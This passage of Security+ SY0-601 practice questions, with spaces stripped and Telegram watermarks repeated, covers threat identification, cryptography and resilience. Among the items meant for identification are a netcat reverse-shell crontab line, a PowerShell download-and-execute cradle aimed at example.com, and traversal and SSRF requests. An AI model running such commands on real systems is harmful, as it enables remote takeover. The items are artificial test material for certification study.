B. Theseverityofthevulnerability
C. Thetimerequiredtoremediate
D. Yourresponsibilityforcompromiseddata
150. Christinarunsavulnerabilityscanofacustomernetworkanddiscoversthataconsumerwirelessrouteronthenetworkreturnsaresultreportingdefaultlogincredentials.Whatcommonconfigurationissuehassheencountered?
A. Anunpatcheddevice
B. Anoutofsupportdevice
C. Anunsecuredadministratoraccount
D. Anunsecureduseraccount
151. Whattypeofteamisusedtotestsecuritybyusingtoolsandtechniquesthatanactualattackerwoulduse?
A. Aredteam
B. Ablueteam
C. Awhiteteam
D. Apurpleteam
152. Whilereviewingweblogsforherorganization'swebsiteKathleendiscoverstheentryshownhere:
GEThttp://example.com/viewarticle.php?view=../../../config.txt
HTTP/1.1
Whattypeofattackhasshepotentiallydiscovered?
A. Adirectorytraversalattacks
B. Awebapplicationbufferoverflow
C. Adirectoryrecursionattack
D. Aslashdotattack
153. WhatisthekeydifferentiatorbetweenSOARandSIEMsystems?
Telegram Channel @nettrain
A. SOARintegrateswithawiderrangeofapplications.
B. SIEMincludesthreatandvulnerabilitymanagementtools.
C. SOARincludessecurityoperationsautomation.
D. SIEMincludessecurityoperationsautomation.
154. Yourcompanyhashiredapenetrationtestingfirmtotestthenetwork.Forthetest,youhavegiventhecompanydetailsonoperatingsystemsyouuse,applicationsyourun,andnetworkdevices.Whatbestdescribesthistypeoftest?
A. Knownenvironmenttest
B. Externaltest
C. Unknownenvironmenttest
D. Threattest
155. Whattwofilesarecommonlyattackedusingofflinebrute-forceattacks?
A. TheWindowsregistryandtheLinux/etc/passwdfile
B. TheWindowsSAMandtheLinux/etc/passwdfile
C. TheWindowsSAMandtheLinux/etc/shadowfile
D. TheWindowsregistryandtheLinux/etc/shadowfile
156. WhattypeofattackisanSSLstrippingattack?
A. Abrute-forceattack
B. ATrojanattack
C. Anon-pathattack
D. Adowngradeattack
157. WhattypeofattackistheU.S.TrustedFoundryprogramintendedtohelpprevent?
A. Criticalinfrastructureattacks
B. Metalworkandcastingattacks
C. Supplychainattacks
D. Softwaresourcecodeattacks
Telegram Channel @nettrain
158. Nicolewantstoshowthemanagementinherorganizationreal-timedataaboutattacksfromaroundtheworldviamultipleserviceprovidersinavisualway.Whattypeofthreatintelligencetoolisoftenusedforthispurpose?
A. Apiechart
B. Athreatmap
C. Adarkwebtracker
D. AnOSINTrepository
159. Youhavenoticedthatwheninacrowdedarea,datafromyourcellphoneisstolen.LaterinvestigationshowsaBluetoothconnectiontoyourphone,onethatyoucannotexplain.Whatdescribesthisattack?
A. Bluejacking
B. Bluesnarfing
C. Eviltwin
D. RAT
160. Thetypeandscopeoftesting,clientcontactdetails,howsensitivedatawillbehandled,andthetypeandfrequencyofstatusmeetingsandreportsareallcommonelementsofwhatartifactofapenetrationtest?
A. Theblack-boxoutline
B. Therulesofengagement
C. Thewhite-boxoutline
D. Theclose-outreport
161. AmandaencountersaBashscriptthatrunsthefollowingcommand:
crontab-e0****ncexample.com8989-e/bin/bash
Whatdoesthiscommanddo?
A. Itchecksthetimeeveryhour.
B. Itpullsdatafromexample.comeveryminute.
C. Itsetsupareverseshell.
D. Noneoftheabove
Telegram Channel @nettrain
162. ApenetrationtestercalledahelpdeskstaffmemberatthecompanythatCharlesworksatandclaimedtobeaseniorexecutivewhoneededherpasswordchangedimmediatelyduetoanimportantmeetingtheyneededtoconductthatwouldstartinafewminutes.Thestaffmemberchangedtheexecutive'spasswordtoapasswordthatthepenetrationtesterprovided.Whatsocialengineeringprincipledidthepenetrationtesterleveragetoaccomplishthisattack?
A. Intimidation
B. Scarcity
C. Urgency
D. Trust
163. Patrickhassubscribedtoacommercialthreatintelligencefeedthatisonlyprovidedtosubscriberswhohavebeenvettedandwhopayamonthlyfee.Whatindustrytermisusedtorefertothistypeofthreatintelligence?
A. Proprietarythreatintelligence
B. OSINT
C. ELINT
D. Corporatethreatintelligence
164. Whatthreathuntingconceptinvolvesthinkinglikeamaliciousactortohelpidentifyindicatorsofcompromisethatmightotherwisebehidden?
A. Intelligencefusion
B. Maneuver
C. Threatfeedanalysis
D. Bulletinanalysis
165. Whattypeofmaliciousactorwilltypicallyhavetheleastamountofresourcesavailabletothem?
A. Nation-states
B. Scriptkiddies
C. Hacktivists
D. Organizedcrime
Telegram Channel @nettrain
166. ASYNfloodseekstooverwhelmasystembytyingupalltheopensessionsthatitcancreate.Whattypeofattackisthis?
A. ADDoS
B. Aresourceexhaustionattack
C. Anapplicationexploit
D. Avulnerabilityexploit
167. ApenetrationtestercallsastaffmemberforhertargetorganizationandintroducesherselfasamemberoftheITsupportteam.Sheasksifthestaffmemberhasencounteredaproblemwiththeirsystem,thenproceedstoaskfordetailsabouttheindividual,claimingsheneedstoverifythatsheistalkingtotherightperson.Whattypeofsocialengineeringattackisthis?
A. Pretexting
B. Awateringholeattack
C. Prepending
D. Shouldersurfing
168. Whattermdescribestheuseofairplanesordronestogathernetworkorotherinformationaspartofapenetrationtestorintelligencegatheringoperation?
A. Droning
B. AirSnarfing
C. Warflying
D. Aerialsnooping
169. Gabbywantstoprotectalegacyplatformwithknownvulnerabilities.Whichofthefollowingisnotacommonoptionforthis?
A. Disconnectitfromthenetwork.
B. Placethedevicebehindadedicatedfirewallandrestrictinboundandoutboundtraffic.
C. RelyontheoutdatedOStoconfuseattackers.
D. MovethedevicetoaprotectedVLAN.
170. IntheUnitedStates,collaborativeindustryorganizationsthatanalyzeand
Telegram Channel @nettrain
sharecybersecuritythreatinformationwithintheirindustryverticalsareknownbywhatterm?
A. IRTs
B. ISACs
C. Feedburners
D. Verticalthreatfeeds
171. Afterrunningnmapagainstasystemonanetwork,LuccaseesthatTCPport23isopenandaserviceisrunningonit.Whatissueshouldheidentify?
A. LowportsshouldnotbeopentotheInternet.
B. Telnetisaninsecureprotocol.
C. SSHisaninsecureprotocol.
D. Ports1-1024arewell-knownportsandmustbefirewalled.
172. Duringapenetrationtest,CamerongainsphysicalaccesstoaWindowssystemandusesasystemrepairdisktocopycmd.exetothe%systemroot%\system32directorywhilerenamingitsethc.exe.Whenthesystemboots,heisabletologinasanunprivilegeduser,hittheShiftkeyfivetimes,andopenacommandpromptwithsystem-levelaccessusingstickykeys.Whattypeofattackhasheconducted?
A. ATrojanattack
B. Aprivilegeescalationattack
C. Adenial-of-serviceattack
D. Aswapfileattack
173. Adamwantstodescribethreatactorsusingcommonattributes.Whichofthefollowinglistisnotacommonattributeusedtodescribethreatactors?
A. Internal/external
B. Resourcesorfundinglevel
C. Yearsofexperience
D. Intent/motivation
174. Madhuriisconcernedaboutthesecurityofthemachinelearningalgorithms
Telegram Channel @nettrain
thatherorganizationisdeploying.Whichofthefollowingoptionsisnotacommonsecurityprecautionformachinelearningalgorithms?
A. Ensuringthesourcedataissecureandofsufficientquality
B. Requiringathird-partyreviewofallproprietaryalgorithms
C. Requiringchangecontrolanddocumentationforallchangestothealgorithms
D. Ensuringasecureenvironmentforalldevelopment,dataacquisition,andstorage
175. Frankispartofawhiteteamforacybersecurityexercise.Whatrolewillheandhisteamhave?
A. Performingoversightandjudgingoftheexercise
B. Providingfulldetailsoftheenvironmenttotheparticipants
C. Providingpartialdetailsoftheenvironmenttotheparticipants
D. Providingdefenseagainsttheattackersintheexercise
176. Susanreceives$10,000forreportingavulnerabilitytoavendorwhoparticipatesinaprogramtoidentifyissues.Whattermiscommonlyusedtodescribethistypeofpayment?
A. Aransom
B. Apayday
C. Abugbounty
D. Azero-daydisclosure
177. Charlessetsthepermissionsonthe/etcdirectoryonaLinuxsystemto777usingthechmodcommand.IfAlexlaterdiscoversthis,whatshouldhereporthisfindingas?
A. Openorweakpermissions
B. Improperfilehandling
C. Aprivilegeescalationattack
D. Noneoftheabove
178. Duringapenetrationtest,Kathleengathersinformation,includingtheorganization'sdomainname,IPaddresses,employeeinformation,phone
Telegram Channel @nettrain
numbers,emailaddresses,andsimilardata.Whatisthisprocesstypicallycalled?
A. Mapping
B. Footprinting
C. Fingerprinting
D. Aggregation
179. Whattermisusedtodescribemappingwirelessnetworkswhiledriving?
A. Wi-driving
B. Traffictesting
C. Wardriving
D. CARINT
180. Freddiscoversthatthelightingandutilitycontrolsystemsforhiscompanyhavebeenoverwhelmedbytrafficsenttothemfromhundredsofexternalnetworkhosts.Thishasresultedinthelightsandutilitysystemmanagementsystemsnotreceivingappropriatereporting,andtheendpointdevicescannotreceivecommands.Whattypeofattackisthis?
A. ASCADAoverflow
B. Anoperationaltechnology(OT)DDoS
C. AnetworkDDoS
D. AnapplicationDDoS
181. Benrunsavulnerabilityscanusingup-to-datedefinitionsforasystemthatheknowshasavulnerabilityintheversionofApachethatitisrunning.Thevulnerabilityscandoesnotshowthatissuewhenhereviewsthereport.WhathasBenencountered?
A. Asilentpatch
B. Amissingvulnerabilityupdate
C. Afalsenegative
D. Afalsepositive
182. Whattypeoftechniqueiscommonlyusedbymalwarecreatorstochangethesignatureofmalwaretoavoiddetectionbyantivirustools?
Telegram Channel @nettrain
A. Refactoring
B. Cloning
C. Manualsourcecodeediting
D. Changingprogramminglanguages
183. Whattermdescribesamilitarystrategyforpoliticalwarfarethatcombinesconventionalwarfare,irregularwarfare,andcyberwarfarewithfakenews,socialmediainfluencestrategies,diplomaticefforts,andmanipulationoflegalactivities?
A. Socialwarfare
B. Hybridwarfare
C. Socialinfluence
D. Cybersocialinfluencecampaigns
184. ChrisisnotifiedthatoneofhisstaffwaswarnedviaatextmessagethattheFBIisawarethattheyhaveaccessedillegalwebsites.Whattypeofissueisthis?
A. Aphishingattempt
B. Identityfraud
C. Ahoax
D. Aninvoicescam
185. SarahisreviewingthelogsforherwebserverandseesanentryflaggedforreviewthatincludesthefollowingHTTPrequest:
CheckinstockAPI=http://localhost/admin.php
Whattypeofattackismostlikelybeingattempted?
A. Across-sitescriptingattack
B. Server-siderequestforgery
C. Client-siderequestforgery
D. SQLinjection
186. Angelareviewsbulletinsandadvisoriestodeterminewhatthreatsherorganizationislikelytoface.Whattypeofactivityisthisassociatedwith?
Telegram Channel @nettrain
A. Incidentresponse
B. Threathunting
C. Penetrationtesting
D. Vulnerabilityscanning
187. Whydoattackerstargetpasswordsstoredinmemory?
A. Theyareencryptedinmemory.
B. Theyarehashedinmemory.
C. Theyareofteninplaintext.
D. Theyareoftende-hashedforuse.
188. TheU.S.DepartmentofHomelandSecurity(DHS)providesanautomatedindicatorsharing(AIS)servicethatallowsforthefederalgovernmentandprivatesectororganizationstosharethreatdatainrealtime.TheAISserviceusesopensourceprotocolsandstandardstoexchangethisinformation.WhichofthefollowingstandardsdoestheAISserviceuse?
A. HTMLandHTTPS
B. SFTPandXML
C. STIXandTRIX
D. STIXandTAXII
189. Duringwhatphaseofapenetrationtestisinformationlikeemployeenames,phonenumber,andemailaddressesgathered?
A. Exploitation
B. Establishingpersistence
C. Reconnaissance
D. Lateralmovement
190. Duringapenetrationtest,Angelaobtainstheuniformofawell-knownpackagedeliveryserviceandwearsitintothetargetoffice.SheclaimstohaveadeliveryforaC-levelemployeesheknowsisthereandinsiststhatthepackagemustbesignedforbythatperson.Whatsocialengineeringtechniquehassheused?
A. Impersonation
Telegram Channel @nettrain
B. Whaling
C. Awateringholeattack
D. Prepending
191. Nickpurchaseshisnetworkdevicesthroughagraymarketsupplierthatimportsthemintohisregionwithoutanofficialrelationshipwiththenetworkdevicemanufacturer.WhatriskshouldNickidentifywhenheassesseshissupplychainrisk?
A. Lackofvendorsupport
B. Lackofwarrantycoverage
C. Inabilitytovalidatethesourceofthedevices
D. Alloftheabove
192. ChristinawantstoidentifyindicatorsofattackforXML-basedwebapplicationsthatherorganizationruns.WhereisshemostlikelytofindinformationthatcanhelpherdeterminewhetherXMLinjectionisoccurringagainstherwebapplications?
A. Syslog
B. Webserverlogs
C. Authenticationlogs
D. Eventlogs
193. WhatcanFrankdotodetermineifheissufferingfromadenial-of-service(DoS)attackagainsthiscloudhostingenvironment?
A. Nothing;cloudservicesdonotprovidesecuritytools.
B. CallthecloudserviceprovidertohavethemstoptheDoSattack.
C. Reviewthecloudserviceprovider'ssecuritytoolsandenableloggingandanti-DoStoolsiftheyexist.
D. Callthecloudserviceprovider'sInternetserviceprovider(ISP)andaskthemtoenableDoSprevention.
194. Frankisusingthecloudhostingservice'swebpublishingserviceratherthanrunninghisownwebservers.WherewillFrankneedtolooktoreviewhislogstoseewhattypesoftraffichisapplicationiscreating?
Telegram Channel @nettrain
A. Syslog
B. Apachelogs
C. Thecloudservice'sweblogs
D. Noneoftheabove
195. IfFrankwerestilloperatinginhison-siteinfrastructure,whichofthefollowingtechnologieswouldprovidethemostinsightintowhattypeofattackhewasseeing?
A. Afirewall
B. AnIPS
C. Avulnerabilityscanner
D. Antimalwaresoftware
196. Alainawantstoensurethattheon-sitesystemintegrationthatavendorthathercompanyisworkingwithisdoneinaccordancewithindustrybestpractices.Whichofthefollowingisnotacommonmethodofensuringthis?
A. Insertingsecurityrequirementsintocontracts
B. Auditingconfigurations
C. Coordinatingwiththevendorforsecurityreviewsduringandafterinstallation
D. RequiringanSOCreport
197. EliashasimplementedanAI-basednetworktrafficanalysistoolthatrequireshimtoallowthetooltomonitorhisnetworkforaperiodoftwoweeksbeforebeingputintofullproduction.WhatisthemostsignificantconcernheneedstoaddressbeforeusingtheAI'sbaseliningcapabilities?
A. Thenetworkshouldbeisolatedtopreventoutboundtrafficfrombeingaddedtothenormaltrafficpatterns.
B. Compromisedorotherwisemaliciousmachinescouldbeaddedtothebaselineresultingintaintedtrainingdata.
C. Trafficpatternsmaynotmatchtrafficthroughoutalongertimeframe.
D. TheAImaynotunderstandthetrafficflowsinhisnetwork.
198. Whatisthetypicalgoalintentorgoalofhacktivists?
Telegram Channel @nettrain
A. Increasingtheirreputation
B. Financialgain
C. Makingapoliticalstatement
D. Gatheringhigh-valuedata
199. Wheredoestheinformationforpredictiveanalysisforthreatintelligencecomefrom?
A. Currentsecuritytrends
B. Largesecuritydatasets
C. Behaviorpatterns
D. Alloftheabove
200. SocialSecuritynumbersandotherpersonalinformationareoftenstolenforwhatpurpose?
A. Blackmail
B. Tailgating
C. Identityfraud
D. Impersonation
201. Securityorchestration,automation,andresponse(SOAR)toolshavethreemajorcomponents.Whichofthefollowingisnotoneofthosecomponents?
A. Sourcecodesecurityanalysisandtesting
B. Threatandvulnerabilitymanagement
C. Securityincidentresponse
D. Securityoperationsautomation
202. Directaccess,wireless,email,supplychain,socialmedia,removablemedia,andcloudareallexamplesofwhat?
A. Threatintelligencesources
B. Threatvectors
C. Attributesofthreatactors
D. Vulnerabilities
Telegram Channel @nettrain
203. SourceForgeandGitHubarebothexamplesofwhattypeofthreatintelligencesource?
A. Thedarkweb
B. Automatedindicatorsharingsources
C. Fileorcoderepositories
D. Publicinformationsharingcenters
204. Whatistherootcauseofimproperinputhandling?
A. Impropererrorhandling
B. Trustingratherthanvalidatingdatainputs
C. Lackofuserawareness
D. Impropersourcecodereview
205. ClairediscoversthefollowingPowerShellscript.Whatdoesitdo?
powershell.exe-epBypass-nop-noexit-ciex
((NewObjectNet.WebClient).
DownloadString('https://example.com/file.psl))
A. Downloadsafileandopensaremoteshell
B. Uploadsafileanddeletesthelocalcopy
C. Downloadsafileintomemory
D. Uploadsafilefrommemory
206. Kathleen'sIPSflagstrafficfromtwoIPaddressesasshownhere:
SourceIP:10.11.94.111
http://example.com/home/show.php?SESSIONID=a3fghbby
SourceIP:192.168.5.34
http://example.com/home/show.php?SESSIONID=a3fghbby
Whattypeofattackshouldsheinvestigatethisas?
A. ASQLinjectionattack
B. Across-sitescriptingattack
C. Asessionreplayattack
Telegram Channel @nettrain
D. Aserver-siderequestforgeryattack
207. TherearesevenimpactcategoriesthatyouneedtoknowfortheSecurity+exam.Whichofthefollowingisnotoneofthem?
A. Databreaches
B. Datamodification
C. Dataexfiltration
D. Dataloss
208. Whichofthefollowingresearchsourcesistypicallytheleasttimelywhensourcingthreatintelligence?
A. Vulnerabilityfeeds
B. Localindustrygroups
C. Academicjournals
D. Threatfeeds
209. Whilereviewingauthlogsonaserverthatshemaintains,Megannoticesthefollowinglogentries:
Apr2620:01:32examplesysrshd[6101]:Connectionfrom
10.0.2.15onillegalport
Apr2620:01:48examplesysrshd[6117]:Connectionfrom
10.0.2.15onillegalport
Apr2620:02:02examplesysrshd[6167]:Connectionfrom
10.0.2.15onillegalport
Apr2620:02:09examplesysrshd[6170]:Connectionfrom
10.0.2.15onillegalport
Apr2620:02:09examplesysrshd[6172]:Connectionfrom
10.0.2.15onillegalport
Apr2620:02:35examplesysrshd[6188]:Connectionfrom
10.0.2.15onillegalport
Apr2620:02:35examplesysrlogind[6189]:Connectionfrom
10.0.2.15onillegalport
Whathasshemostlikelydetected?
A. Asuccessfulhackingattempt
B. Afailedservicestartup
C. Avulnerabilityscan
Telegram Channel @nettrain
D. Asystemreboot
210. ThefollowinggraphicshowsareportfromanOpenVASvulnerabilityscan.WhatshouldCharlesdofirsttodeterminethebestfixforthevulnerabilityshown?
A. DisablePHP-CGI.
B. UpgradePHPtoversion5.4.
C. ReviewthevulnerabilitydescriptionsintheCVEslisted.
D. Disablethewebserver.
211. Ianrunsavulnerabilityscan,whichnotesthataserviceisrunningonTCP
Telegram Channel @nettrain
port8080.Whattypeofserviceismostlikelyrunningonthatport?
A. SSH
B. RDP
C. MySQL
D. HTTP
212. RickrunsWPScanagainstapotentiallyvulnerableWordPressinstallation.WPScanisawebapplicationsecurityscannerdesignedspecificallyforWordPresssites.Aspartofthescanresults,henoticesthefollowingentry:
WhatshouldRickdoafterremediatingthisvulnerability?
A. Installawebapplicationfirewall.
B. ReviewthepatchingandupdatingprocessfortheWordPresssystem.
C. Searchforothercompromisedsystems.
D. ReviewIPSlogsforattacksagainstthevulnerableplug-in.
213. CarolynrunsavulnerabilityscanofanetworkdeviceanddiscoversthatthedeviceisrunningservicesonTCPports22and443.Whatserviceshasshemostlikelydiscovered?
A. Telnetandawebserver
B. FTPandaWindowsfileshare
C. SSHandawebserver
Telegram Channel @nettrain
D. SSHandaWindowsfileshare
214. Ryanneedstoverifythatnounnecessaryportsandservicesareavailableonhissystems,buthecannotrunavulnerabilityscanner.Whatishisbestoption?
A. Passivenetworktrafficcapturetodetectservices
B. Aconfigurationreview
C. Activenetworktrafficcapturetodetectservices
D. Logreview
215. Whyisimpropererrorhandlingforwebapplicationsthatresultsindisplayingerrormessagesconsideredavulnerabilitythatshouldberemediated?
A. Errorscanbeusedtocrashthesystem.
B. Manyerrorsresultinraceconditionsthatcanbeexploited.
C. Manyerrorsprovideinformationaboutthehostsystemoritsconfiguration.
D. Errorscanchangesystempermissions.
216. SomeusersonyournetworkuseAcmeBankfortheirpersonalbanking.Thoseusershaveallrecentlybeenthevictimofanattack,inwhichtheyvisitedafakeAcmeBankwebsiteandtheirloginswerecompromised.Theyallvisitedthebankwebsitefromyournetwork,andalloftheminsisttheytypedinthecorrectURL.Whatisthemostlikelyexplanationforthissituation?
A. Trojanhorse
B. IPspoofing
C. Clickjacking
D. DNSpoisoning
217. JohnisanetworkadministratorforAcmeCompany.Hehasdiscoveredthatsomeonehasregisteredadomainnamethatisspelledjustoneletterdifferentthanhiscompany'sdomain.ThewebsitewiththemisspelledURLisaphishingsite.Whatbestdescribesthisattack?
A. Sessionhijacking
Telegram Channel @nettrain
Chapter2ArchitectureandDesign
THECOMPTIASECURITY+EXAMSY0-601TOPICSCOVEREDINTHISCHAPTERINCLUDETHEFOLLOWING:
2.1 Explaintheimportanceofsecurityconceptsinanenterpriseenvironment
2.2 Summarizevirtualizationandcloudcomputingconcepts
2.3 Summarizesecureapplicationdevelopment,deployment,andautomationconcepts
2.4 Summarizeauthenticationandauthorizationdesignconcepts
2.5 Givenascenario,implementcybersecurityresilience
2.6 Explainthesecurityimplicationsofembeddedandspecializedsystems
2.7 Explaintheimportanceofphysicalsecuritycontrols
2.8 Summarizethebasicsofcryptographicconcepts
1. Benisreviewingconfigurationmanagementdocumentationforhisorganizationandfindsthefollowingdiagraminhiscompany'sdocumentrepository.Whatkeyinformationismissingfromthediagramthatasecurityprofessionalwouldneedtobuildfirewallrulesbasedonthediagram?
A. Thesubnetmask
Telegram Channel @nettrain
B. Theservicename
C. Theprotocolthetrafficuses
D. TheAPIkey
2. Youareresponsiblefornetworksecurityatane-commercecompany.Youwanttoensurethatyouareusingbestpracticesforthee-commercewebsiteyourcompanyhosts.Whatstandardwouldbethebestforyoutoreview?
A. OWASP
B. NERC
C. TrustedFoundry
D. ISA/IEC
3. Cherylisresponsibleforcybersecurityatamid-sizedinsurancecompany.Shehasdecidedtouseadifferentvendorfornetworkantimalwarethansheusesforhostantimalware.Isthisarecommendedaction,andwhyorwhynot?
A. Thisisnotrecommended;youshoulduseasinglevendorforaparticularsecuritycontrol.
B. Thisisrecommended;thisisdescribedasvendordiversity.
C. Thisisnotrecommended;thisisdescribedasvendorforking.
D. Itisneutral.Thisdoesnotimproveordetractfromsecurity.
4. Scottwantstobackupthecontentsofanetwork-attachedstorage(NAS)deviceusedinacriticaldepartmentinhiscompany.Heisconcernedabouthowlongitwouldtaketorestorethedeviceifasignificantfailurehappened,andheislessconcernedabouttheabilitytorecoverintheeventofanaturaldisaster.Giventheserequirements,whattypeofbackupshouldheusefortheNAS?
A. Atape-basedbackupwithdailyfullbackups
B. AsecondNASdevicewithafullcopyoftheprimaryNAS
C. Atape-basedbackupwithnightlyincrementalbackups
D. Acloud-basedbackupservicethatuseshighdurabilitynear-linestorage
5. Yasmineisrespondingtoafulldatacenteroutage,andafterreferencingthe
Telegram Channel @nettrain
documentationforthesystemsinthedatacentershebringsthenetworkbackup,thenfocusesonthestorageareanetwork(SAN),followedbythedatabaseservers.Whydoesherorganizationlistsystemsforhertobringbackonlineinaparticularseries?
A. Thepowersupplyforthebuildingcannothandleallthedevicesstartingatonce.
B. Theorganizationwantstoensurethatasecondoutagedoesnotoccurduetofailedsystems.
C. Theorganizationwantstoensurethatsystemsaresecureandhavetheresourcestheyneedbyfollowingarestorationorder.
D. Thefiresuppressionsystemmayactivateduetothesuddenchangeinheat,causingsignificantdamagetothesystems.
6. Enriqueisconcernedaboutbackupdatabeinginfectedbymalware.Thecompanybacksupkeyserverstodigitalstorageonabackupserver.Whichofthefollowingwouldbemosteffectiveinpreventingthebackupdatabeinginfectedbymalware?
A. PlacethebackupserveronaseparateVLAN.
B. Air-gapthebackupserver.
C. Placethebackupserveronadifferentnetworksegment.
D. Useahoneynet.
7. WhattypeofattributeisaWindowspicturepassword?
A. Somewhereyouare
B. Somethingyouexhibit
C. Somethingyoucando
D. Someoneyouknow
8. Whichofthefollowingisnotacriticalcharacteristicofahashfunction?
A. Itconvertsvariable-lengthinputintoafixed-lengthoutput.
B. Multipleinputsshouldnothashtothesameoutput.
C. Itmustbereversible.
D. Itshouldbefasttocompute.
Telegram Channel @nettrain
9. Naomiwantstohireathird-partysecuredatadestructioncompany.Whatprocessismostfrequentlyusedtoensurethatthirdpartiesproperlyperformdatadestruction?
A. Manualon-siteinspectionbyfederalinspectors
B. Contractualrequirementsandacsertificationprocess
C. Requiringpicturesofeverydestroyeddocumentordevice
D. Alloftheabove
10. Oliviawantstoensurethatthecodeexecutedaspartofherapplicationissecurefromtamperingandthattheapplicationitselfcannotbetamperedwith.Whichofthefollowingsolutionsshouldsheuseandwhy?
A. Server-sideexecutionandvalidation,becauseitpreventsdataandapplicationtampering
B. Client-sidevalidationandserver-sideexecutiontoensureclientdataaccess
C. Server-sidevalidationandclient-sideexecutiontopreventdatatampering
D. Client-sideexecutionandvalidation,becauseitpreventsdataandapplicationtampering
11. Trevorwantstouseaninexpensivedevicetobuildacustomembeddedsystemthatcanmonitoraprocess.Whichofthefollowingoptionsisbestsuitedforthisifhewantstominimizeexpenseandmaximizesimplicitywhileavoidingthepotentialforsystemordevicecompromise?
A. ARaspberryPi
B. AcustomFPGA
C. ArepurposeddesktopPC
D. AnArduino
12. AmandawantstouseadigitalsignatureonanemailsheissendingtoMaria.Whichkeyshouldsheusetosigntheemail?
A. Maria'spublickey
B. Amanda'spublickey
C. Maria'sprivatekey
Telegram Channel @nettrain
D. Amanda'sprivatekey
13. Nickwantstomakeanencryptionkeyhardertocrack,andheincreasesthekeylengthbyonebitfroma128-bitencryptionkeytoa129-bitencryptionkeyasanexampletoexplaintheconcept.Howmuchmoreworkwouldanattackerhavetodotocrackthekeyusingbruteforceifnootherattacksortechniquescouldbeapplied?
A. Onemore
B. 129more
C. Twiceasmuch
D. Fourtimesasmuch
14. GurvinderknowsthattheOpenSSLpasswdfileprotectspasswordsbyusing1,000roundsofMD5hashingtohelpprotectpasswordinformation.Whatisthistechniquecalled?
A. Spinningthehash
B. Keyrotation
C. Keystretching
D. Hashiteration
15. Fredwantstomakeitharderforanattackertouserainbowtablestoattackthehashedpasswordvalueshestores.WhatshouldheaddtoeverypasswordbeforeitishashedtomakeitimpossiblefortheattackertosimplyusealistofcommonhashedpasswordstorevealthepasswordsFredhasstorediftheygainaccesstothem?
A. Asalt
B. Acipher
C. Aspice
D. Atrapdoor
16. IanwantstosendanencryptedmessagetoMichelleusingpublickeycryptography.Whatkeydoesheneedtoencryptthemessage?
A. Hispublickey
B. Hisprivatekey
Telegram Channel @nettrain
C. Herpublickey
D. Herprivatekey
17. WhatkeyadvantagedoesanellipticalcurvecryptosystemhaveoveranRSA-basedcryptosystem?
A. Itcanuseasmallerkeylengthforthesameresistancetobeingbroken.
B. Itrequiresonlyasinglekeytoencryptanddecrypt.
C. Itcanrunonolderprocessors.
D. Itcanbeusedfordigitalsignaturesaswellasencryption.
18. Whatcryptographiccapabilityensuresthateveniftheserver'sprivatekeyiscompromised,thesessionkeyswillnotbecompromised?
A. Perfectforwardsecrecy
B. Symmetricencryption
C. Quantumkeyrotation
D. Diffie-Hellmankeymodulation
19. Alainaisreviewingpracticesforherreceptiondeskandwantstoensurethatthereceptiondesk'svisitorlogisaccurate.Whatprocessshouldsheaddtotheguard'scheck-inprocedure?
A. Checkthevisitor'sIDagainsttheirlogbookentry.
B. Performabiometricscantovalidatevisitoridentities.
C. Requiretwo-personintegritycontrol.
D. Replacetheguardwithasecurityrobot.
20. Inanattempttoobservehackertechniques,asecurityadministratorconfiguresanonproductionnetworktobeusedasatargetsothathecancovertlymonitornetworkattacks.Whatisthistypeofnetworkcalled?
A. Activedetection
B. Falsesubnet
C. IDS
D. Honeynet
21. Whattypeofsystemisusedtocontrolandmonitorpowerplantpower
Telegram Channel @nettrain
generationsystems?
A. IPG
B. SEED
C. SCADA
D. ICD
22. Whatmajortechnicalcomponentofmoderncryptographicsystemsislikelytobesusceptibletoquantumattacks?
A. Keygeneration
B. Ellipticalplotalgorithms
C. Cubicrootcurvecryptography
D. Primefactorizationalgorithms
23. Geoffwantstoestablishacontractwithacompanytohavedatacenterspacethatisequippedandreadytogosothathecanbringhisdatatothelocationintheeventofadisaster.Whattypeofdisasterrecoverysiteishelookingfor?
A. Ahotsite
B. Acoldsite
C. Awarmsite
D. AnRTOsite
24. OlivianeedstoensureanIoTdevicedoesnothaveitsoperatingsystemmodifiedbythirdpartiesafteritissold.Whatsolutionshouldsheimplementtoensurethatthisdoesnotoccur?
A. Setadefaultpassword.
B. Requiresignedandencryptedfirmware.
C. ChecktheMD5sumfornewfirmwareversions.
D. Patchregularly.
25. Whatstatementisexpectedtobetrueforapost-quantumcryptographyworld?
A. Encryptionspeedwillbemeasuredinqubits.
Telegram Channel @nettrain
B. Nonquantumcryptosystemswillnolongerbesecure.
C. Quantumencryptionwillnolongerberelevant.
D. Keylengthslongerthan4,096bitsusingRSAwillberequired.
26. Whatfunctiondoescountermodeperforminacryptographicsystem?
A. Itreversestheencryptionprocess.
B. Itturnsablockcipherintoastreamcipher.
C. Itturnsastreamcipherintoablockcipher.
D. Itallowspublickeystounlockprivatekeys.
27. Whichofthefollowingitemsisnotincludedinablockchain'spublicledger?
A. Arecordofallgenuinetransactionsbetweennetworkparticipants
B. Arecordofcryptocurrencybalances(orotherdata)storedintheblockchain
C. Theidentityoftheblockchainparticipants
D. Atokenthatidentifiestheauthorityunderwhichthetransactionwasmade
28. Suzanisresponsibleforapplicationdevelopmentinhercompany.Shewantstohaveallwebapplicationstestedbeforetheyaredeployedlive.Shewantstouseatestsystemthatisidenticaltotheliveserver.Whatisthiscalled?
A. Aproductionserver
B. Adevelopmentserver
C. Atestserver
D. Apredeploymentserver
29. Alexandraispreparingtorunautomatedsecuritytestsagainstthecodethatdevelopersinherorganizationhavecompleted.Whichenvironmentisshemostlikelytoruntheminifthenextstepistodeploythecodetoproduction?
A. Development
B. Test
Telegram Channel @nettrain
C. Staging
D. Production
30. ChriswantstolimitwhocanuseanAPIthathiscompanyprovidesandbeabletologusageoftheAPIuniquelytoeachorganizationthattheyprovideaccessto.Whatsolutionismostoftenusedtodothis?
A. Firewallswithrulesforeachcompany'spublicIPaddress
B. Usercredentialsforeachcompany
C. APIkeys
D. APIpasswords
31. Derekhasbeenassignedtoassessthesecurityofsmartmeters.Whichofthefollowingisnotacommonconcernforanembeddedsystemlikeasmartmeter?
A. Eavesdropping
B. Denialofservice
C. Remotedisconnection
D. SQLinjection
32. Selahwantstoanalyzereal-worldattackpatternsagainstsystemssimilartowhatshealreadyhasdeployedinherorganization.Shewouldliketoseelocalcommandsonacompromisedsystemandhaveaccesstoanytoolsorothermaterialstheattackerswouldnormallydeploy.Whattypeoftechnologycouldsheusetodothis?
A. Ahoneypot
B. AnIPS
C. AnIDS
D. AWAF
33. Charlessetsupanetworkwithintentionalvulnerabilitiesandtheninstrumentsitsothathecanwatchattackersandcapturedetailsoftheirattacksandtechniques.WhathasCharlessetup?
A. Ablackhole
B. Ahoneyhole
Telegram Channel @nettrain
C. Aspynet
D. Ahoneynet
